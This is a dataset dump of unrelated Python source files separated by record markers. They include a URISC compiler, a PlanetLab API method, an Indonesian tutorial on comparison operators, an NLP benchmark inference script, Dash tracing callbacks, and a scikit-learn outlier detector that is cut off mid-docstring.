self, # pylint: disable=no-self-use
start_ts: Timestamp, # pylint: disable=unused-argument
end_ts: Timestamp, # pylint: disable=unused-argument
) -> List[MarginPosition]:
return [] # noop for iconomi
def query_online_income_loss_expense(
self, # pylint: disable=no-self-use
start_ts: Timestamp, # pylint: disable=unused-argument
end_ts: Timestamp, # pylint: disable=unused-argument
) -> List[LedgerAction]:
return [] # noop for iconomi
| StarcoderdataPython |
5072338 | import string
import sys
class URISC_V1_Extended:
def __init__(self, code):
self.code = code
self.output = ['1 ?\n']
self.functions = {}
self.label_num = 0
self.temp_num = 0
def comp(self):
for line in self.code.split('\n'):
# print(line)
self.output.append(self.compln(line))
self.output = ''.join(self.output)
def tokln(self, line):
if not line:
return
out = []
current = ''
# Char type stuff
chartype = ''
last_chartype = ''
rb = 0 # Regular-bracket = 0
# Set initial char type
if line[0].isalnum():
chartype = 'A'
# elif line[0].isdigit():
# chartype = 'D'
elif line[0] in string.punctuation:
chartype = 'S'
# elif line[0] == '\n':
# chartype = 'L'
elif line[0].isspace():
chartype = 'W'
for c in line:
last_chartype = chartype
# Set char type for each character
if c.isalnum():
chartype = 'A'
# elif c.isdigit():
# chartype = 'D'
elif c in string.punctuation:
chartype = 'S'
# elif c == '\n':
# chartype = 'L'
elif c.isspace():
chartype = 'W'
if chartype == 'W' and rb <= 0:
out.append(current)
current = ''
else:
current += c
# Concatenation stuff
if c == '(':
rb += 1
elif c == ')':
rb -= 1
# Final token
out.append(current)
# Filter
out = [a for a in out if a]
# print(out)
return out
def compln(self, line):
line = self.tokln(line)
out = ''
if not line or line[0].startswith('#'):
return ''
if line[0] == '```':
out = ' '.join(line[1:])
if line[0] == 'invert':
out = line[1] + ' ?\n'
elif line[0] == 'set':
# Set variable to 0
label = self.get_label()
out = (
label + '\n' +
line[1] + ' ' + label + '\n'
)
# Invert variable if desired
if line[2] != '0' and line[2] != 'false':
out += line[1] + ' ?\n'
elif line[0] == 'jump':
out = (
'? ' + line[1] + '\n' +
'? ' + line[1] + '\n'
)
elif line[0] == 'if':
exp = self.compexp(line[1])
label = line[2]
# Jump to label if expression result is 1
out = (
exp + ' ?\n' +
exp + ' ' + label + '\n'
)
elif line[0] == 'ifn':
exp = self.compexp(line[1])
label = line[2]
# Jump to label if expression result is 0
out = exp + ' ' + label + '\n'
elif line[0] == 'label':
out = line[1] + '\n'
elif line[0] == 'print':
# Iterate over each expression in the line and print it as a bit
for bit in line[1:]:
exp = self.compexp(bit)
# Print bit to output buffer
label_1 = self.get_label()
label_2 = self.get_label()
out += (
# Set out to 0
label_1 + '\n' +
'out ' + label_1 + '\n' +
# Invert out if expression result
exp + ' ' + label_2 + '\n' +
'out ?\n' +
label_2 + '\n' +
exp + ' ?\n' +
# Print bit to output buffer
'print ?\n'
)
elif '=' in line:
# var = exp
var = line[0]
exp = line[2]
# Expression expansion
exp = self.compexp(exp)
# Move expression result into var
label_1 = self.get_label()
label_2 = self.get_label()
out = (
# Set var to 0
label_1 + '\n' +
var + ' ' + label_1 + '\n' +
# Invert var if expression result
exp + ' ' + label_2 + '\n' +
var + ' ?\n' +
label_2 + '\n' +
exp + ' ?\n'
)
elif '=>' in line:
# func => arg1,arg2,arg2 ((arg1 & arg2) | arg3)
name = line[0]
args = line[2].split(',')
exp = line[3]
self.functions[name] = [args, exp]
return out
def compexp(self, expression):
line = self.tokln(expression)
out = ''
if not expression:
return ''
# Unary operators
if line[0].startswith('(:') and line[0].endswith(')'):
# Tokenise this bracket expression
exp = self.tokln(line[0][2:-1])
# Get result of (op a) and store in a temporary variable
op = exp[0]
a = exp[1]
# Expression expansion
if a.startswith('(') and a.endswith(')'):
a = self.compexp(a)
# Perform operations
if op == '!':
label_1 = self.get_label()
label_2 = self.get_label()
# Return the result of this code
out = self.get_temp()
# Add literal code to the output
self.output.append(
# Set out to 0
label_1 + '\n' +
out + ' ' + label_1 + '\n' +
# Invert out if not a
a + ' ?\n' +
a + ' ' + label_2 + '\n' +
out + ' ?\n' +
label_2 + '\n'
)
'''
a ?
a label_1
temp_1 ?
label_1
'''
# Logic gates (Binary operators)
elif line[0].startswith('(') and line[0].endswith(')'):
# Tokenise this bracket expression
exp = self.tokln(line[0][1:-1])
# Get result of (a op b) and store in a temporary variable
while len(exp) > 1:
a = exp[0]
op = exp[1]
b = exp[2]
result = ''
# Expression expansion
if a.startswith('(') and a.endswith(')'):
a = self.compexp(a)
if b.startswith('(') and b.endswith(')'):
b = self.compexp(b)
# Perform operations
if op == '&':
label_1 = self.get_label()
label_2 = self.get_label()
label_3 = self.get_label()
# Return the result of this code
result = self.get_temp()
# Add literal code to the output
self.output.append(
# Set result to 0
label_1 + '\n' +
result + ' ' + label_1 + '\n' +
# Perform logical and
a + ' ' + label_2 + '\n' +
b + ' ' + label_3 + '\n' +
result + ' ?\n' +
label_3 + '\n' +
b + ' ?\n' +
label_2 + '\n' +
a + ' ?\n'
)
'''
a end_1
b end_2
output ?
end_2
b ?
end_1
a ?
'''
elif op == '|':
label_1 = self.get_label()
label_2 = self.get_label()
label_3 = self.get_label()
# Return the result of this code
result = self.get_temp()
# Add literal code to the output
self.output.append(
# Set result to 0
label_1 + '\n' +
result + ' ' + label_1 + '\n' +
# Perform logical or
a + ' ?\n' +
a + ' ' + label_2 + '\n' +
b + ' ?\n' +
b + ' ' + label_3 + '\n' +
result + ' ?\n' +
label_3 + '\n' +
label_2 + '\n' +
result + ' ?\n'
)
'''
a ?
a end_1
b ?
b end_2
output ?
end_2
end_1
output ?
'''
elif op == '^':
label_1 = self.get_label()
label_2 = self.get_label()
label_3 = self.get_label()
# Return the result of this code
result = self.get_temp()
# Add literal code to the output
self.output.append(
# Set result to 0
label_1 + '\n' +
result + ' ' + label_1 + '\n' +
# Perform logical xor
a + ' ' + label_2 + '\n' +
result + ' ?\n' +
label_2 + '\n' +
a + ' ?\n' +
b + ' ' + label_3 + '\n' +
result + ' ?\n' +
label_3 + '\n' +
b + ' ?\n'
)
'''
a end_1
output ?
end_1
a ?
b end_2
output ?
end_2
b ?
'''
else:
raise Exception('invalid binary operation: "' + op + '"')
exp[:3] = [result]
# Return the final result
out = exp[0]
# Function calling
elif line[0].startswith('!(') and line[0].endswith(')'):
# Retrieve function info
line = self.tokln(line[0][2:-1])
name = line[0]
args = line[1:]
function = self.functions[name]
func_args = function[0]
exp = function[1]
# print('Calling', function, 'with', args)
# Check arg lengths
if len(args) != len(func_args):
raise Exception('invalid number of arguments for function')
# Save local variables to be retrieved later
for arg_index in range(len(args)):
local_arg = args[arg_index]
temp_var = 'FUNCTION_ARG_' + local_arg
# Move local variables to function argument variables
label_1 = self.get_label()
label_2 = self.get_label()
self.output.append(
# Set temporary variable to 0
label_1 + '\n' +
temp_var + ' ' + label_1 + '\n' +
# Invert temporary variable if local arg is 1
local_arg + ' ' + label_2 + '\n' +
temp_var + ' ?\n' +
label_2 + '\n' +
local_arg + ' ?\n'
)
# Move temp variables into function argument variables
for arg_index in range(len(func_args)):
func_arg = func_args[arg_index]
local_arg = args[arg_index]
temp_var = 'FUNCTION_ARG_' + local_arg
# Move local variables to function argument variables
label_1 = self.get_label()
label_2 = self.get_label()
self.output.append(
# Set function arg to 0
label_1 + '\n' +
func_arg + ' ' + label_1 + '\n' +
# Invert function arg if temp var is 1
temp_var + ' ' + label_2 + '\n' +
func_arg + ' ?\n' +
label_2 + '\n' +
temp_var + ' ?\n'
)
# Compute and return expression
out = self.compexp(exp)
# Digits
elif line[0] == '0':
return '0'
elif line[0] == '1':
return '1'
# Keywords
elif line[0] == 'in':
label_1 = self.get_label()
label_2 = self.get_label()
# Return the result of this code
out = self.get_temp()
self.output.append(
# Set out to 0
label_1 + '\n' +
out + ' ' + label_1 + '\n' +
# Invert out if input bit is 1
'in ' + label_2 + '\n' +
out + ' ?\n' +
label_2 + '\n' +
out + ' ?\n'
)
else:
return expression
return out
def get_label(self):
label = 'L_' + str(self.label_num)
self.label_num += 1
return label
def get_temp(self):
temp = 'T_' + str(self.temp_num)
self.temp_num += 1
return temp
with open(sys.argv[1]) as f:
code = f.read()
compiler = URISC_V1_Extended(code)
compiler.comp()
# print('\n\nResult code:\n\n')
# print(compiler.output)
with open(sys.argv[1] + '.urisc_v1', 'w') as f:
f.write(compiler.output)
| StarcoderdataPython |
3340294 | <reponame>dreibh/planetlab-lxc-plcapi<gh_stars>0
from PLC.Faults import *
from PLC.Method import Method
from PLC.Parameter import Parameter, Mixed
from PLC.Auth import Auth
from PLC.NodeGroups import NodeGroup, NodeGroups
class DeleteNodeGroup(Method):
"""
Delete an existing Node Group.
ins may delete any node group
Returns 1 if successful, faults otherwise.
"""
roles = ['admin']
accepts = [
Auth(),
Mixed(NodeGroup.fields['nodegroup_id'],
NodeGroup.fields['groupname'])
]
returns = Parameter(int, '1 if successful')
def call(self, auth, node_group_id_or_name):
# Get account information
nodegroups = NodeGroups(self.api, [node_group_id_or_name])
if not nodegroups:
raise PLCInvalidArgument("No such node group")
nodegroup = nodegroups[0]
nodegroup.delete()
# Logging variables
self.event_objects = {'NodeGroup': [nodegroup['nodegroup_id']]}
self.message = 'Node group %d deleted' % nodegroup['nodegroup_id']
return 1
| StarcoderdataPython |
3295233 | <filename>Basic/operator/operator_perbandingan.py<gh_stars>10-100
# Operator Perbandingan (Comparison Operator) digunakan untuk
# Membadingkan antara dua nilai
# contoh
# Variable
a = 5
b = 3
# == (sama dengan) digunakan untuk membandingkan
# apakah kedua nilai memiliki nilai yang sama
print("a == b:", a == b) # False
# != (tidak sama dengan) digunakan untuk membadingkan
# apakah kedua nilai tidak memiliki nilai yang sama
print("a != b:", a != b) # True
# > (lebih besar dari) digunakan untuk membandingkan
# apakah nilai kiri lebih besar dari nilai kanan
print("a > b:", a > b) # True
# < (lebih kecil dari) digunakan untuk membadingkan
# apakah nilai kiri lebih kecil dari nilai kanan
print("a < b:", a < b) # False
# >= (lebih besar dari atau sama dengan) digunakan untuk membandingkan
# apakah nilai kiri lebih besar dari atau sama dengan nilai kanan
print("a >= b:", a >= b) # True
# <= (lebih kecil dari atau sama dengan) digunakan untuk membadingkan
# apakah nilai kiri lebih kecil dari atau sama dengan nilai kanan
print("a <= b:", a <= b) # False
| StarcoderdataPython |
8045926 | <reponame>vhnatyk/vlsistuff
#! /usr/bin/python3
import waveformer
print('AFTER')
| StarcoderdataPython |
99446 | <reponame>jstzwj/Mocores<gh_stars>1-10
from mocores.core.util.consistent_hash import (ConsistentHash)
from mocores.core.util.identity import (WorkerID)
from mocores.core.util.message_queue import (MessageQueue)
from mocores.core.util.lru import (LRU) | StarcoderdataPython |
11298151 | # -*- coding: utf-8 -*-
import torch
import os
import sys
sys.path.append('../lightning-transformers')
import argparse
import json
import re
from torch.utils.data import DataLoader
from transformers import AutoTokenizer, AutoModelForSequenceClassification, T5TokenizerFast, T5ForConditionalGeneration
from typing import List, Text
from tqdm import tqdm
from sklearn.metrics import precision_recall_fscore_support, accuracy_score
from models.kobart.tokenization_kobart import KoBartTokenizerFast as tok_kobart
from models.kobert.tokenization_kobert import KoBertTokenizer as tok_kobert
from models.kogpt2.tokenization_kogpt2 import KoGPT2TokenizerFast as tok_kogpt2
AUTOMODEL_LIST = ['bert-base-cased', 'bert-large-cased', 'roberta-base', 'roberta-large',
'albert-base-v2', 'albert-large-v2', 'google/electra-small-discriminator',
'google/electra-large-discriminator', 'facebook/bart-base', 'monologg/koelectra-base-v2-discriminator',
'gpt2', 'gpt2-large', 'monologg/kobert', 'hyunwoongko/kobart', 'skt/kogpt2-base-v2']
CUSTOM_TOKENIZER = ['kobert', 'kobart', 'kogpt2']
T5MODEL_LIST = ['t5-base', 't5-large', 't5-3B', 't5-11B']
GLUE_TASK_LIST = ['rte', 'mrpc', 'mnli', 'qnli', 'qqp']
KOR_TASK_LIST = ['kornli', 'klue_nli', 'klue_sts']
class AutoModelInferencer:
def __init__(
self,
model,
):
self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
self.model = model
self.model.to(self.device)
def __call__(self, data_loader) -> List:
outp = []
for batch in tqdm(data_loader):
inputs = dict()
for key, value in batch.items():
if key == 'labels':
continue
inputs[key] = value.to(self.device)
logits = self.model(**inputs)['logits']
preds = logits.argmax(dim=-1)
preds = preds.detach().cpu().tolist()
outp += preds
return outp
class T5ModelInferencer:
def __init__(
self,
model,
tokenizer
):
self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
self.model = model
self.model.to(self.device)
self.tokenizer = tokenizer
def __call__(self, data_loader) -> List:
outp = []
for batch in tqdm(data_loader):
inputs = dict()
for key, value in batch.items():
if key == 'labels':
continue
inputs[key] = value.to(self.device)
generated = self.model.generate(**inputs, max_length=16)
for g_ in generated:
o_ = self.tokenizer.decode(g_)
outp.append(self.prepro_generated_sent(o_))
return outp
@staticmethod
def prepro_generated_sent(sent: Text) -> Text:
PREPRO_PATTERN = re.compile('<[/a-zA-Z]+>')
return PREPRO_PATTERN.sub(repl='', string=sent).strip()
def prepare_model(args):
n_class_dict = {
"mnli": 3,
"rte": 2,
"qqp": 2,
"qnli": 2,
"mrpc": 2,
"kornli": 3,
"klue_sts": 2,
"klue_nli": 3
}
print(f'model type: {args.model_type}')
if args.model_type in AUTOMODEL_LIST:
model = AutoModelForSequenceClassification.from_pretrained(args.model_type,
num_labels=n_class_dict.get(args.dataset))
nomalized_model_type = args.model_type.split('/')[-1].split('-')[0]
assert nomalized_model_type is not None, 'model_type error'
if nomalized_model_type in CUSTOM_TOKENIZER:
tok = eval(f'tok_{nomalized_model_type}')
tokenizer = tok.from_pretrained(args.model_type)
print(f'> load a custom tokenizer : {nomalized_model_type}')
else:
tokenizer = AutoTokenizer.from_pretrained(args.model_type)
if tokenizer.pad_token is None or model.config.pad_token_id is None:
print('> A pad token is set to a eod_token')
tokenizer.pad_token = tokenizer.eos_token
model.config.pad_token_id = model.config.eos_token_id
elif args.model_type in T5MODEL_LIST:
model = T5ForConditionalGeneration.from_pretrained(args.model_type)
tokenizer = T5TokenizerFast.from_pretrained(args.model_type)
else:
raise NotImplementedError
return model, tokenizer
def prepare_data(args, tokenizer):
if args.dataset in GLUE_TASK_LIST:
if args.dataset == 'rte':
if args.model_type in AUTOMODEL_LIST:
from dataset import RTEAutoInferenceDataset, RTEAutoInferenceReverseDataset, \
RTEAutoInferenceSignalDataset
if args.input_format == 'original':
return RTEAutoInferenceDataset(tokenizer, data_type=args.data_type)
elif args.input_format == 'reverse':
return RTEAutoInferenceReverseDataset(tokenizer, data_type=args.data_type)
else:
return RTEAutoInferenceSignalDataset(tokenizer, data_type=args.data_type)
elif args.model_type in T5MODEL_LIST:
from dataset import RTET5InferenceDataset, RTET5InferenceReverseDataset, RTET5InferenceSignalDataset
if args.input_format == 'original':
return RTET5InferenceDataset(tokenizer, data_type=args.data_type)
elif args.input_format == 'reverse':
return RTET5InferenceReverseDataset(tokenizer, data_type=args.data_type)
else:
return RTET5InferenceSignalDataset(tokenizer, data_type=args.data_type)
else:
raise NotImplementedError
elif args.dataset == 'mrpc':
if args.model_type in AUTOMODEL_LIST:
from dataset import MRPCAutoInferenceDataset, MRPCAutoInferenceReverseDataset, \
MRPCAutoInferenceSignalDataset
if args.input_format == 'original':
return MRPCAutoInferenceDataset(tokenizer, data_type=args.data_type)
elif args.input_format == 'reverse':
return MRPCAutoInferenceReverseDataset(tokenizer, data_type=args.data_type)
else:
return MRPCAutoInferenceSignalDataset(tokenizer, data_type=args.data_type)
elif args.model_type in T5MODEL_LIST:
from dataset import MRPCT5InferenceDataset, MRPCT5InferenceReverseDataset, \
MRPCT5InferenceSignalDataset
if args.input_format == 'original':
return MRPCT5InferenceDataset(tokenizer, data_type=args.data_type)
elif args.input_format == 'reverse':
return MRPCT5InferenceReverseDataset(tokenizer, data_type=args.data_type)
else:
return MRPCT5InferenceSignalDataset(tokenizer, data_type=args.data_type)
else:
raise NotImplementedError
elif args.dataset == 'mnli':
if args.model_type in AUTOMODEL_LIST:
from dataset import MNLIAutoInferenceDataset, MNLIAutoInferenceReverseDataset, \
MNLIAutoInferenceSignalDataset
if args.input_format == 'original':
return MNLIAutoInferenceDataset(tokenizer, data_type=args.data_type)
elif args.input_format == 'reverse':
return MNLIAutoInferenceReverseDataset(tokenizer, data_type=args.data_type)
else:
return MNLIAutoInferenceSignalDataset(tokenizer, data_type=args.data_type)
elif args.model_type in T5MODEL_LIST:
from dataset import MNLIT5InferenceDataset, MNLIT5InferenceReverseDataset, \
MNLIT5InferenceSignalDataset
if args.input_format == 'original':
return MNLIT5InferenceDataset(tokenizer, data_type=args.data_type)
elif args.input_format == 'reverse':
return MNLIT5InferenceReverseDataset(tokenizer, data_type=args.data_type)
else:
return MNLIT5InferenceSignalDataset(tokenizer, data_type=args.data_type)
else:
raise NotImplementedError
elif args.dataset == 'qnli':
if args.model_type in AUTOMODEL_LIST:
from dataset import QNLIAutoInferenceDataset, QNLIAutoInferenceReverseDataset, \
QNLIAutoInferenceSignalDataset
if args.input_format == 'original':
return QNLIAutoInferenceDataset(tokenizer, data_type=args.data_type)
elif args.input_format == 'reverse':
return QNLIAutoInferenceReverseDataset(tokenizer, data_type=args.data_type)
else:
return QNLIAutoInferenceSignalDataset(tokenizer, data_type=args.data_type)
elif args.model_type in T5MODEL_LIST:
from dataset import QNLIT5InferenceDataset, QNLIT5InferenceReverseDataset, \
QNLIT5InferenceSignalDataset
if args.input_format == 'original':
return QNLIT5InferenceDataset(tokenizer, data_type=args.data_type)
elif args.input_format == 'reverse':
return QNLIT5InferenceReverseDataset(tokenizer, data_type=args.data_type)
else:
return QNLIT5InferenceSignalDataset(tokenizer, data_type=args.data_type)
else:
raise NotImplementedError
elif args.dataset == 'qqp':
if args.model_type in AUTOMODEL_LIST:
from dataset import QQPAutoInferenceDataset, QQPAutoInferenceReverseDataset, \
QQPAutoInferenceSignalDataset
if args.input_format == 'original':
return QQPAutoInferenceDataset(tokenizer, data_type=args.data_type)
elif args.input_format == 'reverse':
return QQPAutoInferenceReverseDataset(tokenizer, data_type=args.data_type)
else:
return QQPAutoInferenceSignalDataset(tokenizer, data_type=args.data_type)
elif args.model_type in T5MODEL_LIST:
from dataset import QQPT5InferenceDataset, QQPT5InferenceReverseDataset, \
QQPT5InferenceSignalDataset
if args.input_format == 'original':
return QQPT5InferenceDataset(tokenizer, data_type=args.data_type)
elif args.input_format == 'reverse':
return QQPT5InferenceReverseDataset(tokenizer, data_type=args.data_type)
else:
return QQPT5InferenceSignalDataset(tokenizer, data_type=args.data_type)
else:
raise NotImplementedError
else:
raise NotImplementedError
elif args.dataset in KOR_TASK_LIST:
if args.dataset == 'kornli':
if args.model_type in AUTOMODEL_LIST:
from dataset import KorNLIAutoInferenceDataset, KorNLIAutoInferenceReverseDataset, \
KorNLIAutoInferenceSignalDataset
if args.input_format == 'original':
return KorNLIAutoInferenceDataset(tokenizer, data_type=args.data_type)
elif args.input_format == 'reverse':
return KorNLIAutoInferenceReverseDataset(tokenizer, data_type=args.data_type)
else:
return KorNLIAutoInferenceSignalDataset(tokenizer, data_type=args.data_type)
else:
raise NotImplementedError
elif args.dataset == 'klue_nli':
if args.model_type in AUTOMODEL_LIST:
from dataset import KlueNLIAutoInferenceDataset, KlueNLIAutoInferenceReverseDataset, \
KlueNLIAutoInferenceSignalDataset
if args.input_format == 'original':
return KlueNLIAutoInferenceDataset(tokenizer, data_type=args.data_type)
elif args.input_format == 'reverse':
return KlueNLIAutoInferenceReverseDataset(tokenizer, data_type=args.data_type)
else:
return KlueNLIAutoInferenceSignalDataset(tokenizer, data_type=args.data_type)
else:
raise NotImplementedError
elif args.dataset == 'klue_sts':
if args.model_type in AUTOMODEL_LIST:
from dataset import KlueSTSAutoInferenceDataset, KlueSTSAutoInferenceReverseDataset, \
KlueSTSAutoInferenceSignalDataset
if args.input_format == 'original':
return KlueSTSAutoInferenceDataset(tokenizer, data_type=args.data_type)
elif args.input_format == 'reverse':
return KlueSTSAutoInferenceReverseDataset(tokenizer, data_type=args.data_type)
else:
return KlueSTSAutoInferenceSignalDataset(tokenizer, data_type=args.data_type)
else:
raise NotImplementedError
else:
raise NotImplementedError
else:
raise NotImplementedError
def load_model_from_statedict(model, args):
"""
This function is implemented to match the keys in state dict
"""
nomalized_model_type = args.model_type.split('/')[-1].split('-')[0]
if torch.cuda.is_available():
print('> load model path : ', os.path.join(args.dir_path, args.model_dir, f'{nomalized_model_type}-{args.dataset}.ckpt'))
savefile = torch.load(os.path.join(args.dir_path, args.model_dir, f'{nomalized_model_type}-{args.dataset}.ckpt'))
else:
savefile = torch.load(os.path.join(args.dir_path, args.model_dir, f'{nomalized_model_type}-{args.dataset}.ckpt'),
map_location=torch.device('cpu'))
new_state_dict = {}
for key, value in savefile['state_dict'].items():
if nomalized_model_type in ['kobart', 'bart']:
if 'classification' in key:
new_state_dict[key.replace('model.', '')] = value # match keys
continue
new_state_dict[key.replace('model.model', 'model')] = value # match keys
else:
new_state_dict[key.replace('model.', '')] = value # match keys
model.load_state_dict(new_state_dict)
return model
def main(args):
dir_path = os.path.dirname(os.path.abspath(__file__))
args.dir_path = dir_path
print("Loading models...")
if args.dataset in GLUE_TASK_LIST + KOR_TASK_LIST:
model, tokenizer = prepare_model(args)
else:
raise NotImplementedError
print("Loading data...")
dataset = prepare_data(args, tokenizer)
data_loader = DataLoader(dataset, batch_size=args.batch_size)
if args.model_type in AUTOMODEL_LIST:
model = load_model_from_statedict(model, args)
inferencer = AutoModelInferencer(model)
elif args.model_type in T5MODEL_LIST:
inferencer = T5ModelInferencer(model, tokenizer)
else:
raise NotImplementedError
model.eval()
predictions = inferencer(data_loader)
perf_dict = {}
if args.data_type == 'validation':
acc = accuracy_score(y_true=dataset.label, y_pred=predictions)
precision, recall, f1, _ = precision_recall_fscore_support(
y_true=dataset.label,
y_pred=predictions,
average='weighted'
)
perf_dict['accuracy'] = acc
perf_dict['precision'] = precision
perf_dict['recall'] = recall
perf_dict['f1'] = f1
print(f"{args.model_type}|{args.dataset}| Accuracy: {acc}")
outputs = {
"idx": [i for i in range(len(predictions))],
# "inputs": [s for s in dataset.input_sents],
"preds": predictions
}
if perf_dict:
outputs.update(perf_dict)
save_path = os.path.join(dir_path, args.save_dir, args.model_type.split('/')[-1])
os.makedirs(save_path, exist_ok=True)
file_name = f"{args.dataset}-{args.data_type}-{args.input_format}.json"
with open(os.path.join(save_path, file_name), 'w') as saveFile:
json.dump(outputs, saveFile)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--model_type', type=str, default='google/electra-small-discriminator',
help='type or pre-trained models')
parser.add_argument('--dataset', type=str, default='mnli',
help='finetuning task name')
parser.add_argument('--data_type', type=str, default='test', choices=['test', 'validation'],
help='type of data for inference')
parser.add_argument('--input_format', type=str, default='original', choices=['original', 'reverse', 'signal'],
help='type of input format')
parser.add_argument('--batch_size', type=int, default=20,
help='size of batch for inference')
parser.add_argument('--save_dir', type=str, default='../result/',
help='directory to save results')
parser.add_argument('--model_dir', type=str, default='../model_binary/',
help='directory path where binary file is saved')
args = parser.parse_args()
main(args)
| StarcoderdataPython |
11200520 | <gh_stars>0
'''
This module contains all callbacks regarding the realtime tracing
'''
from dash import callback_context
from dash.dependencies import Input, Output, State
from dash.exceptions import PreventUpdate
from tracerface.web_ui.alerts import (
ErrorAlert,
SuccessAlert,
TraceErrorAlert,
WarningAlert
)
from tracerface.web_ui.dashboard import Dashboard
from tracerface.web_ui.graph import Graph
from tracerface.web_ui.trace_setup import (
BinaryAlreadyAddedError,
BinaryNotExistsError,
ConfigFileError,
FunctionNotInBinaryError
)
# Disable function managagement buttons if no function is selected
def disable_manage_app_buttons(app):
output = [
Output('manage-functions-button', 'disabled'),
Output('remove-app-button', 'disabled')
]
input = [Input('applications-select', 'value')]
@app.callback(output, input)
def disable(app):
disabled = not app
return disabled, disabled
# Disable config load button if no path is provided
def disable_load_config_button(app):
output = Output('load-config-button', 'disabled')
input = [Input('config-file-path', 'value')]
@app.callback(output, input)
def disable(path):
return not path
# Load output of bcc trace output
def disable_load_button(app):
output = Output('load-output-button', 'disabled')
input = [Input('output-path', 'value')]
@app.callback(output, input)
def disable(content):
return not content
# Stop tracing if an error occurs
def stop_trace_on_error(app, trace_controller):
output = [
Output('trace-button', 'on'),
Output('trace-error-notification', 'children')
]
input = [Input('timer', 'n_intervals')]
state = [State('trace-button', 'on')]
@app.callback(output, input, state)
def stop_trace(timer_tick, trace_on):
if timer_tick and trace_on:
if trace_controller.thread_error():
return False, TraceErrorAlert(trace_controller.thread_error())
raise PreventUpdate
# Start realtime tracing
def start_or_stop_trace(app, call_graph, setup, trace_controller):
output = Output('timer', 'disabled')
input = [Input('trace-button', 'on')]
state = [State('timer', 'disabled')]
@app.callback(output, input, state)
def switch_state(trace_on, timer_disabled):
if trace_on:
call_graph.clear()
trace_controller.start_trace(setup.generate_bcc_args(), call_graph)
elif not timer_disabled:
trace_controller.stop_trace()
return not trace_on
# Update color slider based on graph and set colors
def update_color_slider(app, call_graph):
output = Output('slider-div', 'children')
input = [
Input('graph', 'elements'),
Input('timer', 'disabled')
]
@app.callback(output, input)
def update(elements, timer_off):
if not callback_context.triggered:
raise PreventUpdate
disabled = call_graph.max_count() < 1 or not timer_off
return Dashboard.slider(call_graph.get_yellow(), call_graph.get_red(),
call_graph.max_count(), disabled)
# Disable parts of the interface while tracing is active
def disable_searchbar(app, call_graph):
output = Output('searchbar', 'disabled')
input = [
Input('graph', 'elements'),
Input('timer', 'disabled')
]
@app.callback(output, input)
def switch_disables(elements, timer_off):
disabled = call_graph.max_count() < 1 or not timer_off
return disabled
# Update collection of apps to be traced
def update_apps_dropdown_options(app, setup):
output = [
Output('applications-select', 'options'),
Output('add-app-notification', 'children')
]
input = [
Input('add-app-button', 'n_clicks'),
Input('remove-app-button', 'n_clicks'),
Input('load-config-button', 'n_clicks')
]
state = [
State('application-path', 'value'),
State('applications-select', 'value'),
State('config-file-path', 'value')
]
@app.callback(output, input, state)
def update_options(add, remove, load, app_to_add, app_to_remove, config_path):
if not callback_context.triggered:
raise PreventUpdate
id = callback_context.triggered[0]['prop_id'].split('.')[0]
alert = None
if id == 'add-app-button' and app_to_add:
try:
setup.initialize_binary(app_to_add)
alert = SuccessAlert('Application added')
except BinaryNotExistsError:
msg = 'Binary not found at given path so it is assumed to be a built-in function'
alert = WarningAlert(msg)
setup.initialize_built_in(app_to_add)
elif id == 'remove-app-button' and app_to_remove:
setup.remove_app(app_to_remove)
elif id == 'load-config-button' and config_path:
try:
err_message = setup.load_from_file(config_path)
if err_message:
alert = WarningAlert(err_message)
else:
alert = SuccessAlert('Setup loaded')
except (BinaryAlreadyAddedError, ConfigFileError, FunctionNotInBinaryError) as e:
alert = ErrorAlert(str(e))
return [{"label": app, "value": app} for app in setup.get_apps()], alert
# Update value of application selection on application removal
def clear_selected_app(app):
output = Output('applications-select', 'value')
input = [
Input('remove-app-button', 'n_clicks'),
Input('add-app-button', 'n_clicks')
]
@app.callback(output, input)
def clear_value(add, remove):
if add or remove:
return None
raise PreventUpdate
# Save animation status and spacing between nodes
def update_graph_layout(app):
output = Output('graph', 'layout')
input = [
Input('animate-switch', 'value'),
Input('node-spacing-input', 'value')
]
@app.callback(output, input)
def update_spacing_and_animate(animate_switch, spacing):
animate = len(animate_switch) == 1
return Graph.layout(spacing=spacing, animate=animate)
| StarcoderdataPython |
6482543 | <gh_stars>1-10
# This file is part of the Data Cleaning Library (openclean).
#
# Copyright (C) 2018-2021 New York University.
#
# openclean is released under the Revised BSD License. See file LICENSE for
# full license details.
"""Generic outlier detector that uses scikit-learn outlier detection or
clustering algorithms.
"""
from collections import Counter
from sklearn.base import BaseEstimator
from typing import List, Optional
from openclean.embedding.base import Embedding, ValueEmbedder
from openclean.embedding.feature.default import StandardEmbedding
from openclean.profiling.anomalies.base import AnomalyDetector
class SklearnOutliers(AnomalyDetector):
"""Detect outliers in a given value stream based on a scikit-learn outlier
detection or clustering algoritm. Expects a scikit-learn estimator and a
value embedding generator. Outlier detection uses the fit_predict method of
the scikit-learn estimator to get labels for each value. Values that are
assigned a label of -1 are considered outliers.
"""
def __init__(
self, algorithm: BaseEstimator,
features: Optional[ValueEmbedder] = None
):
"""Initialize the embedding generator and the outlier detection or
clustering algorithm. If no feature generator is given the default
feature generator is used.
Parameters
----------
algorithm: sklearn.base.BaseEstimator
Algorithm that is used to detect outliers in a data stream.
features: openclean.profiling.embedding.base.ValueEmbedder, optional
Feature vector generator for values in a data stream.
"""
self.algorithm = algorithm
self.features = StandardEmbedding() if features is None else features
def process(self, values: Counter) -> List:
"""Return set of values that are identified as outliers. This anomaly
detector does not provide any additional provenance for the detected
outlier values (other than the name of the used algorithm).
Parameters
----------
values: dict
Set of distinct scalar values or tuples of scalar values that are
mapped to their respective frequency count.
Returns
-------
dict
"""
# Get the vector embedding for all values in the data stream
vec = Embedding(features=self.features).exec(values)
# Get labels using the fit_predict() metod of the estimator
labels = self.algorithm.fit_predict(vec.data)
# Return values that were assigned label -1.
result = list()
keys = list(vec.keys())
for i in range(len(keys)):
if labels[i] == -1:
result.append(keys[i])
return result
class DBSCANOutliers(SklearnOutliers):
"""Perform outlier detection using DBSCAN clustering."""
def __init__(
self, features=None, eps=0.5, min_samples=5, metric='minkowski',
metric_params=None, algorithm='auto', leaf_size=30, p=2, n_jobs=None
):
"""Initialize the feature generator and all parameters of the DBSCAN
implementation in scikit-learn (documentation copied below).
Parameters
----------
features: openclean.profiling.embedding.base.ValueEmbedder, optional
Generator for feature vectors that computes a vector of numeric values
for a given scalar value (or tuple).
eps : float, default=0.5
The maximum distance between two samples for one to be considered
as in the neighborhood of the other. This is not a maximum bound
on the distances of points within a cluster. This is the most
